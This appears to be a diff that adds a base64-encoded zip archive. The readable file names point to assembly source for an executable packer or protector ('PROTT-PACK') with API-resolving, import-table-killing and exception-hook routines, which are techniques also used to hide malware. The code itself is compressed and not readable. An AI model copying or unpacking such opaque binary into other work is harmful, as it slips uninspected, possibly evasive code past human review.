+kwLuI46zVnnRGvquxBNZ3tp1Qt+1IN4QHzifhN8+bK9XKnI5e0ANJKFymCP4
+tyunImBEtzVR6q7rhaZtfiU1uU5eRB1TUKSGR3c72AyMwF4GoR+tw9Lt2oVC
+lim4HkA6FYhdbvdL8Sqb72oIMJ2hGyV0GhaCywia2UsQFnHYpRgfRACkhHwe
+j5ODvEo+jBEpcBvLeDsdZzoFoOjscwFFT58L8IlXceSwqY2AgLAWnAzY9e+l
+AHQ+wHaxb1/kgbm6zAO2NUoACXDkAXfXawGwjXEKAA4M4uCAvgIO3f8PUEsD
+BBQAAAAIADFNTyzJ7s0eiQYAALEeAAAyAAAAUFJPVFQtUEFDSy9wcm90dHkt
+Y3VycmVudC9zb3VyY2UvcHJvdC9BREUzMkJJTi5BU0mtWdtu3DYQfc9X6LFB
+biQlUZKDPOi2RYGiBYr0uYjrRdcFYrSIWxT9+moONUNxl6NdFNkH2mvycG5n
+hkP6ffHm631evC/6aS5dURR/u7eGfn7T//zxxzffzj/MP/Uf56k4fPf9/JL+
+/s/LwnZd98aZZd3p+fmPu3fv/jWf7x+Pb3/9/f7t0/F52e1r6vbp4Vi6X748
+/nssks/xz7/ws7bNq7J1r6z1RfG++PChsMbWK+z++Nvj09365fHp8fnuRXH2
+ebgvjDen16YdlqEZl8FVPBzoa1kuw2hOWWhN0Dj4dhkGvww9ocxEgwLF2sOB
+JBzCstdmanmTQxlms1AARlnbNYSnYSIjxiFMZKEQGAfoik36mnYiq2u3Aw0C
+12WvTdWTrzqe0GyNyyDmzGs8XPFwdBhs9SUbrNnqaXKC1vMyzBNvUg8cnKnO
+Q6eS15Zk6wwLIWvkiYUhWWhLtvbknL5NtG5o6EiTvtmjBIlxtBY7Ra2DOYrC
+npb1g0SI5M+keg8O+x031WTcBNJaco4INBhoJ2fzUFPx2nZkqy19rRxPzEMe
+Onpe68XXoH9DE2YM5NTdBIMdre2QoMJBTHhFakOTQ5OQHoPfTuRtpWh0Pkmf
+wKaSE6HqFFtnWZsmzSibLPmeT/UxyU2sReZXpMnQBdV1N0E5ELGiTRrxNRuc
+hYI+vQgMVWLifGv22LRZIYCgNe059WFW53DILcr3eeSkMZJ0y295D9PmB3Lz
+KMHFb8lOupsGEuPAQcM7hYkqTORtNRzNUCqQPgToDEN36zAAWBa+CpGHOmRe
+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
